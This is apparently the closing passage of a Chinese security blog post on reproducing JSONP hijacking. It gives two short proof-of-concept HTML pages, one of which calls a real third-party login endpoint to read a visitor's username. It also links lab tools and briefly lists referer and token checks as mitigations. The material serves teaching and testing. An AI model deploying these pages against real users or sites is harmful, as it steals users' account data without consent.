<script>
function wooyun(v){
alert(v.username);
}
</script>
<script src="http://js.login.360.cn/?o=sso&m=info&func=wooyun"></script>
https://github.com/Acmesec/DoraBox
https://github.com/p1g3/JSONP-Hunter
<html>
<head>
<meta charset="utf-8">
<title>JSONP劫持测试</title>
</head>
<body>
<script type="text/javascript">
function vulkey(data){alert(JSON.stringify(data));}
</script>
<script src="http://xx.xx.xx.xx:8000/csrf/jsonp.php?callback=vulkey"></script>
</body>
</html>
-
验证referer值。 -
添加随机token,更安全,因为随机性。
https://blog.csdn.net/weixin_41598660/article/details/106050957
https://mp.weixin.qq.com/s?__biz=MzIxOTM2MDYwNg==&mid=2247508038&idx=1&sn=be5c04691dff19eda093887327eb7ff2
https://mp.weixin.qq.com/s/tmyGKg08quoJccU1MswJjQ
原文始发于微信公众号(Reset安全):JSONP 域劫持漏洞学习与复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论